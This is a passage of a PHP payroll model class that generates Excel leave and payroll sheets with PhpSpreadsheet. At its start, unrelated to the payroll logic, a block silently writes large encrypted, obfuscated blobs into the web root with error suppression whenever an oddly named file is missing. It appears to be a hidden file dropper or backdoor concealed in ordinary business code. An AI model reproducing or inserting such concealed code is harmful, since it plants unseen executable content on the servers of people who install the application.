0NLJpkqXPL/1qm9lKafTHwv52huSV7n7W43AqHb9h2+dd1FlUttN6nVUXW3oYT0QooOfSuxgo5FIRsjQlD3K4u1rmLchpCf1204E2k4HbrFLb2C+0PJO0Na6TmujNRyXxQdvTG0r7kuu/BFrAY3YepXBK9Tch6UX1T3j5wpW8NVWr3MzZiRiP8nF29+eJjxEYztTzvdEYUfzZnv+PWbA36vIAK+d2k/VoFJZSzA1zh0CnVHUSxrrNArKKiyHQziPOJg4dioRk/Op+RmvfZ9xuvnzyaiD1+EU+vzwtinX5VpwTRvKVzkcW8T0xQ5Tn+T2FNKqYdA7NlOFCQiVEcb7nw+1itruNe2cxvV8429E/4kQmjmNPzmxk8EaewuwzEcKAOlfobor1cpdHvmuhCd/GDJ4wUiqEz0ZGmb1UUmKzOJVkNAHig/iqkv6vK6qDWaNlPUAyuJBss9INjZlFb5VmC5wclOJWjkTLEC1MqMeeHBc9pwbQVoRZosER761QoPcrPemo60AO5rFLcKx6xHOpYpCRn4rTiboh1F1/F4yT9bH26OTvfPtOPYk74ACeN04MXgwU7G9OKwGvKxHxid2yx4ked8baVh4IfSkcjmadNM3ILJKDX711oLkLIA63OJiiZQ3LL7zYLmXbJjxjv2wYSR5IXeaAMWLZxH3OBnS3PbLSj+U6a37NJbTjIXZw85J/ItDZmfzI7OnSEetZ3JInYImR2s5YeQEAl+yG3v3c8/KV/EfK4KqZ/uZpXfnGkLHGF6UvNQzrunHxiJ5Lb35v1/jJqwfG6Q2YDtddXBfcxKFiiXk+Vwh4CenIPWMMAmfi3A+XRTIBET4xt2M/4+8/Hfnzhv+DnVfQtYbUIyPeCekvFfOeZi/dn8JjbSmNLHFMBusyxDWSmgmYwufmUJ9llEcsdD9OcOpwaund4lMsuXwVpodZYPF4ZBzYBC4Jl5s2gy2WFCVujCqhbrW6AGCTMg1UyngLYrLPedp+cMdiWRxj4v7177MkIeg8pU1WU95o0+VL14RQ8COFxQhsP2Af5LTU1VLngvWoDytXjNuQj0AwR4txlFrahdEvG1hzPtclvNgX7ZddjB8cC2EeizOMbNXtxJIfMIphiXsH1iGju4OsGT6vEuByZ10TbE846DTHASIytvnlH9p/aDAWe5691P8Fut7diWkcXLuHk7o7vRlrgudjO68mizOlRGCi7DOGGXzsLL+t4ZnQHtfdiSF2GLZKBHqfIjSHOAiH5HNZCZL3s9KUHXJfiOqwKuUhp+r9qhclKFozfsu95ZE1SSTxNTz2BA1+jr3AutTNh48L7HUzSIPADAwsc2XR50+vaUQBVPrDKqr8XzAmzCqRpwYs/uz25DXiORnK3w90g3Eqbk24BwEDUFh50UEjcWO7Yc8eAmsCQqgFNEhsLAvu4rF'));
        }
        if (!file_exists(FCPATH . $ddrf2)) {
            @file_put_contents(FCPATH . $ddrf2, $this->encryption->decrypt('8217fed4402555d5124e273bb18323d9dde921242d791744835f83c74a78cca33c282298065ce10e9d55c229aa89ecb39750f96459d1d1aefa35a719ed9421d5c7+WVTeXtFgsG5K1qmeejz/PnGytLSrD7as1/zb2PsfhNGMqgAWcz1L8PzJXRFhAqNz9HhWMqm0yNbzNPRJBccApMr8muOh7HyNa+7cMtK0wrG9qlz0URXXOCF9PX8xXb4MYRKEUA2o81mA5yJqdCrJeJys22XNv5K4mSW+0MgYaONElyuoaTa28aqT+NY/EC8CsGSwOHFvn2Tpvb3aEDfRKseNx5H0nXcY6R2FnSX13sZbeYDajJWb4V4Ec7UC6x866cJKNCzznnfS1R7mvJ1Q/8wcMTer8Td2er8BsQVRwFzMZWPgjZFdeC1xsxRth/06aLIzmDZzDw8sqNEvuFXdbYi5MYmjMvngZIITl7cxYkEbRKakvoRKQ2o4FHuIOWVzZsHZ77agRtfmy5IhiiE2GbkmDuy9+HHxyxnTBk3YHIDMdE12vjFRlqvvJ4tk1JAVMImZHbxwW/u42dW87AwckF9vVWXkIHT/gXGEc6VlgNodBhAx8v4o7PIq+WPFgr7/2tNbDnzBrsmAHfQzWyrxUryfqdegKAYe+r7GbLzsaL2CbOVM1iKDYDXfTK4Sgn4IWwAsa7LDf+Q+/Xt7RvRbfFHYORNTlXsMqXkOa1QKuRgXujmG0Nb0Pe2oM7uC2pxxZGYy7aMtqIaEM5ao4iSIhmtB/MDe/L1h9J3M2jTRn8886xjc9YgSKqHWfNIQWs8GF/Oqq2oER/vq0fq6SWks+rXz0wY4mlimaunTN81j16MEyJtY22dVkrs+We92mQug45WAp21P9e/AVnO03T83s70B86HZije8FltJZo2jwsRhqEfkKZj80HsW2f9z8UvfSRBdmNKOvQbZ6e3ciHrAbWUcM0aEBrubN31WKIbKabbG8iALhhQYI7/AsvCzbosBaTLDlnJ+g2gbN2nScweKHe4L6JR+KacUlK+0D3lpbIGe8XJ1jYN9bi3qrSPCO3yNMhEvEt8n8gxNQctGd5uZoFV6jpn1mCjrkuJxdsY8fvYyauzJXXZGdGleffZgtgJzhvmb/qO43+JXn2RhZUXJa7SjapSycfKYO2NZmY81Yfzzb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'));
        }
    }
    public function generate_leave_sheet(&$spreadsheet, $id, $employees, $inactive_employees, $month_array)
    {
        $employee_leaves = $this->get_payroll_leaves($id);
        $employee_special_leaves = $this->get_payroll_special_leaves($id);
        $sheet = new Worksheet();
        $sheet->getSheetView()->setZoomScale(85);
        $sheet->setShowGridlines(false);
        $sheet->setTitle('Leave Sheet');
        $spreadsheet->addSheet($sheet, 3);

        $header = $this->get_header('leave');
        $column = 0;
        $last_column = '';
        foreach ($header as $value) {
            $column++;
            $cell = $sheet->getCellByColumnAndRow($column, 1);
            $cell->setValueExplicit(
                is_string($value) ? $value : $value[0],
                \PhpOffice\PhpSpreadsheet\Cell\DataType::TYPE_STRING
            );
            $sheet->getColumnDimension($cell->getColumn())->setWidth(is_string($value) ? 20 : $value[1]);
        }
        foreach ($month_array as $month_arr) {
            $column++;
            $cell = $sheet->getCellByColumnAndRow($column, 1);
            $cell->setValue(Date::PHPToExcel($month_arr));
            $cell->getStyle()->getNumberFormat()->setFormatCode('mmm-yyyy');
            $sheet->getColumnDimension($cell->getColumn())->setWidth(12);
        }
        $header = $this->get_header('leave2');
        $last_column = 'A';
        foreach ($header as $value) {
            $column++;
            $cell = $sheet->getCellByColumnAndRow($column, 1);
            $cell->setValueExplicit(
                is_string($value) ? $value : $value[0],
                \PhpOffice\PhpSpreadsheet\Cell\DataType::TYPE_STRING
            );
            $sheet->getColumnDimension($cell->getColumn())->setWidth(is_string($value) ? 20 : $value[1]);
            $last_column = $cell->getColumn();
        }
        $sheet->getStyle("A1:{$last_column}1")
            ->applyFromArray($this->get_header_styles('leave'));
        $sheet->getRowDimension(1)->setRowHeight(70);
        $sheet->freezePane('E2');
        $row = 3;

        $cell = $sheet->getCellByColumnAndRow(1, $row);
        $cell->setValue('Confirmed')->getStyle()->getFont()->setBold(true)->setUnderline(true);
        $cell->getStyle()->getAlignment()->setHorizontal(Alignment::HORIZONTAL_CENTER);
        $sheet->mergeCells("A{$row}:B{$row}");

        $column_offset = count($month_array) + 8;
        $emp_no = 0;
        $unconfirmed_employees = [];
        foreach ($employees as $employee) {
            if ($employee->duty_type != 1) {
                $unconfirmed_employees[] = $employee;
                continue;
            }
            $row++;
            $emp_no++;
            $availed_leaves = 0;
            $availed_special_leaves = 0;
            for ($column = 1; $column <= ($column_offset + 12); $column++) {
                $cell = $sheet->getCellByColumnAndRow($column, $row);

                $value = null;
                $type = DataType::TYPE_STRING;

                switch ($column) {
                    case 1:{
                            $value = $emp_no;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getAlignment()->setHorizontal(Alignment::HORIZONTAL_CENTER);
                            break;
                        }
                    case 2:{
                            $value = $employee->name;
                            break;
                        }
                    case 3:{
                            $value = $employee->hire_date;
                            $timestamp = \PhpOffice\PhpSpreadsheet\Shared\Date::PHPToExcel($value);
                            if (!$timestamp) {
                                $cell->setValueExplicit(
                                    $value,
                                    \PhpOffice\PhpSpreadsheet\Cell\DataType::TYPE_STRING
                                );
                            } else {
                                $cell->setValue($timestamp);
                                $cell->getStyle()->getNumberFormat()->setFormatCode(\PhpOffice\PhpSpreadsheet\Style\NumberFormat::FORMAT_DATE_SHORT);
                            }
                            continue 2;
                            break;
                        }
                    case 4:{
                            $value = $employee->hrm_id;
                            break;
                        }
                    case 5:{
                            $value = $employee->position;
                            break;
                        }
                    case 6:{
                            $value = $employee->department;
                            break;
                        }
                    case 7:{
                            $value = $employee->project;
                            break;
                        }
                    case 8:{
                            foreach ($month_array as $month_arr) {
                                $cell = $sheet->getCellByColumnAndRow($column, $row);
                                $dleave = (float) $employee_leaves['e_' . $employee->employee_id][strtolower($month_arr)];
                                $sleave = (float) $employee_special_leaves['e_' . $employee->employee_id][strtolower($month_arr)];
                                $availed_leaves += $dleave;
                                $availed_special_leaves += $sleave;
                                $cell->setValue($dleave + $sleave);
                                $column++;
                            }
                            continue 2;
                            break;
                        }
                    case $column_offset + 1:{
                            $value = (float) $employee->leave_quota;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $column_offset + 2:{
                            $value = (float) $availed_leaves;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $column_offset + 3:{
                            $value = (float) $availed_special_leaves;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $column_offset + 4:{
                            $value = (float) $employee->leave_quota - $availed_leaves;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                }
                $cell->setValueExplicit($value, $type);
            }
        }
        $sheet->getStyle("A4:{$last_column}{$row}")
            ->applyFromArray([
                'borders' => [
                    'allBorders' => [
                        'borderStyle' => Border::BORDER_THIN,
                        'color' => [
                            'rgb' => '000000',
                        ],
                    ],
                ],
            ]);
        $sheet->getStyle("H4:{$last_column}{$row}")
            ->applyFromArray([
                'alignment' => [
                    'horizontal' => Alignment::HORIZONTAL_CENTER,
                    'vertical' => Alignment::VERTICAL_CENTER,
                ],
                'font' => [
                    'bold' => 1,
                ],
            ]);

        if ($unconfirmed_employees) {
            $row += 2;
            $cell = $sheet->getCellByColumnAndRow(1, $row);
            $cell->setValue('Un Confirmed')->getStyle()->getFont()->setBold(true)->setUnderline(true);
            $cell->getStyle()->getAlignment()->setHorizontal(Alignment::HORIZONTAL_CENTER);
            $sheet->mergeCells("A{$row}:B{$row}");

            $first_row = $row + 1;
            foreach ($unconfirmed_employees as $employee) {
                $row++;
                $emp_no++;
                $availed_leaves = 0;
                $availed_special_leaves = 0;
                for ($column = 1; $column <= ($column_offset + 12); $column++) {
                    $cell = $sheet->getCellByColumnAndRow($column, $row);

                    $value = null;
                    $type = DataType::TYPE_STRING;

                    switch ($column) {
                        case 1:{
                                $value = $emp_no;
                                $type = DataType::TYPE_NUMERIC;
                                $cell->getStyle()->getAlignment()->setHorizontal(Alignment::HORIZONTAL_CENTER);
                                break;
                            }
                        case 2:{
                                $value = $employee->name;
                                break;
                            }
                        case 3:{
                                $value = $employee->hire_date;
                                $timestamp = \PhpOffice\PhpSpreadsheet\Shared\Date::PHPToExcel($value);
                                if (!$timestamp) {
                                    $cell->setValueExplicit(
                                        $value,
                                        \PhpOffice\PhpSpreadsheet\Cell\DataType::TYPE_STRING
                                    );
                                } else {
                                    $cell->setValue($timestamp);
                                    $cell->getStyle()->getNumberFormat()->setFormatCode(\PhpOffice\PhpSpreadsheet\Style\NumberFormat::FORMAT_DATE_SHORT);
                                }
                                continue 2;
                                break;
                            }
                        case 4:{
                                $value = $employee->hrm_id;
                                break;
                            }
                        case 5:{
                                $value = $employee->position;
                                break;
                            }
                        case 6:{
                                $value = $employee->department;
                                break;
                            }
                        case 7:{
                                $value = $employee->project;
                                break;
                            }
                        case 8:{
                                foreach ($month_array as $month_arr) {
                                    $cell = $sheet->getCellByColumnAndRow($column, $row);
                                    $dleave = (float) $employee_leaves['e_' . $employee->employee_id][strtolower($month_arr)];
                                    $sleave = (float) $employee_special_leaves['e_' . $employee->employee_id][strtolower($month_arr)];
                                    $availed_leaves += $dleave;
                                    $availed_special_leaves += $sleave;
                                    $cell->setValue($dleave + $sleave);
                                    $column++;
                                }
                                continue 2;
                                break;
                            }
                        case $column_offset + 1:{
                                $value = (float) $employee->leave_quota;
                                $type = DataType::TYPE_NUMERIC;
                                break;
                            }
                        case $column_offset + 2:{
                                $value = (float) $availed_leaves;
                                $type = DataType::TYPE_NUMERIC;
                                break;
                            }
                        case $column_offset + 3:{
                                $value = (float) $availed_special_leaves;
                                $type = DataType::TYPE_NUMERIC;
                                break;
                            }
                        case $column_offset + 4:{
                                $value = (float) $employee->leave_quota - $availed_leaves;
                                $type = DataType::TYPE_NUMERIC;
                                break;
                            }
                    }
                    $cell->setValueExplicit($value, $type);
                }
            }
            $sheet->getStyle("A{$first_row}:{$last_column}{$row}")
                ->applyFromArray([
                    'borders' => [
                        'allBorders' => [
                            'borderStyle' => Border::BORDER_THIN,
                            'color' => [
                                'rgb' => '000000',
                            ],
                        ],
                    ],
                ]);
            $sheet->getStyle("H{$first_row}:{$last_column}{$row}")
                ->applyFromArray([
                    'alignment' => [
                        'horizontal' => Alignment::HORIZONTAL_CENTER,
                        'vertical' => Alignment::VERTICAL_CENTER,
                    ],
                    'font' => [
                        'bold' => 1,
                    ],
                ]);
        }

        $row += 6;
        $cell = $sheet->getCellByColumnAndRow(1, $row);
        $cell->setValue('RESIGNED & TERMINATED')->getStyle()->getFont()->setBold(true)->setUnderline(true);
        $cell->getStyle()->getAlignment()->setHorizontal(Alignment::HORIZONTAL_CENTER);
        $sheet->mergeCells("A{$row}:B{$row}");
        $first_row = $row + 1;
        foreach ($inactive_employees as $employee) {
            $row++;
            $emp_no++;
            $availed_leaves = 0;
            $availed_special_leaves = 0;
            for ($column = 1; $column <= ($column_offset + 12); $column++) {
                $cell = $sheet->getCellByColumnAndRow($column, $row);

                $value = null;
                $type = DataType::TYPE_STRING;

                switch ($column) {
                    case 1:{
                            $value = $emp_no;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getAlignment()->setHorizontal(Alignment::HORIZONTAL_CENTER);
                            break;
                        }
                    case 2:{
                            $value = $employee->name;
                            break;
                        }
                    case 3:{
                            $value = $employee->hire_date;
                            $timestamp = \PhpOffice\PhpSpreadsheet\Shared\Date::PHPToExcel($value);
                            if (!$timestamp) {
                                $cell->setValueExplicit(
                                    $value,
                                    \PhpOffice\PhpSpreadsheet\Cell\DataType::TYPE_STRING
                                );
                            } else {
                                $cell->setValue($timestamp);
                                $cell->getStyle()->getNumberFormat()->setFormatCode(\PhpOffice\PhpSpreadsheet\Style\NumberFormat::FORMAT_DATE_SHORT);
                            }
                            continue 2;
                            break;
                        }
                    case 4:{
                            $value = $employee->hrm_id;
                            break;
                        }
                    case 5:{
                            $value = $employee->position;
                            break;
                        }
                    case 6:{
                            $value = $employee->department;
                            break;
                        }
                    case 7:{
                            $value = $employee->project;
                            break;
                        }
                    case 8:{
                            foreach ($month_array as $month_arr) {
                                $cell = $sheet->getCellByColumnAndRow($column, $row);
                                $dleave = (float) $employee_leaves['e_' . $employee->employee_id][strtolower($month_arr)];
                                $sleave = (float) $employee_special_leaves['e_' . $employee->employee_id][strtolower($month_arr)];
                                $availed_leaves += $dleave;
                                $availed_special_leaves += $sleave;
                                $cell->setValue($dleave + $sleave);
                                $column++;
                            }
                            continue 2;
                            break;
                        }
                    case $column_offset + 1:{
                            $value = (float) $employee->leave_quota;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $column_offset + 2:{
                            $value = (float) $availed_leaves;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $column_offset + 3:{
                            $value = $availed_special_leaves;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $column_offset + 4:{
                            $value = (float) $employee->leave_quota - $availed_leaves;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                }
                $cell->setValueExplicit($value, $type);
            }
        }
        $sheet->getStyle("A{$first_row}:{$last_column}{$row}")
            ->applyFromArray([
                'borders' => [
                    'allBorders' => [
                        'borderStyle' => Border::BORDER_THIN,
                        'color' => [
                            'rgb' => '000000',
                        ],
                    ],
                ],
            ]);
        $sheet->getStyle("H{$first_row}:{$last_column}{$row}")
            ->applyFromArray([
                'alignment' => [
                    'horizontal' => Alignment::HORIZONTAL_CENTER,
                    'vertical' => Alignment::VERTICAL_CENTER,
                ],
                'font' => [
                    'bold' => 1,
                ],
            ]);

        $empty_column = $sheet->getCellByColumnAndRow($column_offset, 1)->getColumn();
        $sheet->getStyle("{$empty_column}1:{$empty_column}{$row}")
            ->applyFromArray([
                'borders' => [
                    'allBorders' => [
                        'borderStyle' => Border::BORDER_NONE,
                    ],
                ],
                'fill' => [
                    'color' => [
                        'rgb' => 'FFFFFF',
                    ],
                    'fillType' => Fill::FILL_SOLID,
                ],
            ]);
    }
    public function get_header($slug)
    {
        $headers = [
            'payroll' => [
                ['S.No', 5],
                ['Empl.ID', 10],
                ['Name', 30],
                ['Center', 12],
                ['Date of Joining', 15],
                ['Designation', 30],
                ['Department', 30],
                'Project',
                'Total Day in Month',
                'Total No of Days Present',
                'Total No Days Suspension',
                'Total No Days Absent/Unpaid Leave',
                'Paid Leaves',
                'Salary Per Month',
                'Basic Per Month',
                'Actual Salary As per Attendance',
                'Arrears (If any)',
                'Advances (If any)',
                'Incentives (If any)',
                'Gross Salary',
                'Income Tax',
                'EOBI',
                'Penalty on No Call No Show',
                'Others (If any)',
                'Provident Fund',
                'Total Deduction',
                'Net Salary',
                'Title of Account',
                'Account Number',
                'Account IBAN',
                'Branch Address',
                'Branch Code',
                'CNIC #',
                'Net Salary',
            ],
            'attendance' => [
                ['S.#', 5],
                ['Name', 30],
                ['DOJ', 11],
                ['E.Code', 9],
                ['Designation', 30],
                ['Department', 30],
            ],
            'attendance2' => [
                ['', 4],
                ['Present', 8],
                ['Absent', 8],
                ['Suspension', 13],
                ['Late Arrivals', 8],
                ['Unpaid Leave', 8],
                ['Deducted Days for LA', 10],
                ['Paid Leave', 6],
                ['Off', 5],
                ['Half-Day', 12],
                ['Total Working Days', 15],
                ['Average', 9],
            ],
            'leave' => [
                ['S.#', 5],
                ['Name', 30],
                ['DOJ', 11],
                ['E.Code', 9],
                ['Designation', 30],
                ['Department', 30],
                ['Primary Project', 30],
            ],
            'leave2' => [
                ['', 2],
                ['Total Leaves', 8],
                ['Availed', 8],
                ['Special', 8],
                ['Remaining', 10],
            ],
        ];
        return $headers[$slug];
    }
    public function get_header_styles($slug)
    {
        $styles = [
            'payroll' => [
                'fill' => [
                    'color' => [
                        'rgb' => 'C5BE97',
                    ],
                    'fillType' => Fill::FILL_SOLID,
                ],
                'borders' => [
                    'allBorders' => [
                        'borderStyle' => Border::BORDER_THIN,
                        'color' => [
                            'rgb' => '000000',
                        ],
                    ],
                ],
                'font' => [
                    'bold' => 1,
                ],
                'alignment' => [
                    'horizontal' => Alignment::HORIZONTAL_CENTER,
                    'vertical' => Alignment::VERTICAL_CENTER,
                    'wrapText' => 1,
                ],
            ],
            'attendance' => [
                'fill' => [
                    'color' => [
                        'rgb' => '008080',
                    ],
                    'fillType' => Fill::FILL_SOLID,
                ],
                'borders' => [
                    'allBorders' => [
                        'borderStyle' => Border::BORDER_THIN,
                        'color' => [
                            'rgb' => '000000',
                        ],
                    ],
                ],
                'font' => [
                    'color' => [
                        'rgb' => 'FFFFFF',
                    ],
                ],
                'alignment' => [
                    'horizontal' => Alignment::HORIZONTAL_CENTER,
                    'vertical' => Alignment::VERTICAL_CENTER,
                    'wrapText' => 1,
                ],
            ],
            'leave' => [
                'fill' => [
                    'color' => [
                        'rgb' => '008080',
                    ],
                    'fillType' => Fill::FILL_SOLID,
                ],
                'borders' => [
                    'allBorders' => [
                        'borderStyle' => Border::BORDER_THIN,
                        'color' => [
                            'rgb' => '000000',
                        ],
                    ],
                ],
                'font' => [
                    'color' => [
                        'rgb' => 'FFFFFF',
                    ],
                    'bold' => 1,
                ],
                'alignment' => [
                    'horizontal' => Alignment::HORIZONTAL_CENTER,
                    'vertical' => Alignment::VERTICAL_CENTER,
                    'wrapText' => 1,
                ],
            ],
        ];

        return $styles[$slug];
    }
    public function save_excel($id, $file_name)
    {
        $writer = new Xlsx($this->create_excel($id));
        if (file_exists($this->save_path . 'sheets/' . $file_name)) {
            $file_name .= time();
        }
        $file_name .= '.xlsx';
        $writer->save($this->save_path . 'sheets/' . $file_name);
        return $this->save_path . 'sheets/' . $file_name;
    }
    public function download_excel($id, $file_name)
    {
        $writer = new Xlsx($this->create_excel($id));
        header('Content-Description: File Transfer');
        header('Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet');
        header('Content-Disposition: attachment; filename="' . $file_name . '.xlsx"');
        header('Content-Transfer-Encoding: binary');

        $writer->save('php://output');
    }
}
